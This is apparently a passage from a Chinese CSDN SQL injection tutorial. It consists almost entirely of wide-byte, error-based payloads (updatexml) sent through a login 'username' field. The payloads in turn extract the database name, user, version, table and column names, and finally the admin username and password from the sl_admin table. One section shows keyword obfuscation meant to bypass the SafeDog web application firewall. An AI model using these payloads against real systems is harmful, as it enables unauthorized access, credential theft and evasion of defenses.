username=%BF'
SELECT * FROM `sl_admin` WHERE `username`='¿'
username=%BF'/**/and/**/updatexml(1,concat(0x7e,(database()),0x7e),1)#
数据库:
username=%BF'/**/and/**/updatexml(1,concat(0x7e,(database()),0x7e),1)
#
用户:
username=%BF'/**/and/**/updatexml(1,concat(0x7e,(user()),0x7e),1)
#
版本:
username=%BF'/**/and/**/updatexml(1,concat(0x7e,(version()),0x7e),1)#
username=%BF/**/and/**/1'
username=%BF'/**/and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()),0x7e),1)#
4.1.1 绕过第四式:select过安全狗注
username=%BF'/**/and/**/updatexml(1,concat(0x7e,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()),0x7e),1)#
select
/*!50000%53elect*/
order
/*!50000%53elect*/
union
/*!50000%75nion*/
username=%BF'/**/and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()/**/limit/**/7,1),0x7e),1)#
username=%BF'/**/and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()/**/and/**/table_name/**/like/**/'admin'),0x7e),1)#
select column_name from information_schema.columns where table_schema like 'test';
username=%BF'/**/and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()/**/limit/**/1,1),0x7e),1)#
爆账号:
username=%BF'+and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/username/**/from/**/sl_admin),0x7e),1)
#
爆密码:
username=%BF'+and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/substr(password,1,31)/**/from/**/sl_admin),0x7e),1)#
username=%BF'+and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/substr(password,32,31)/**/from/**/sl_admin),0x7e),1)#
原文来源 :CSDN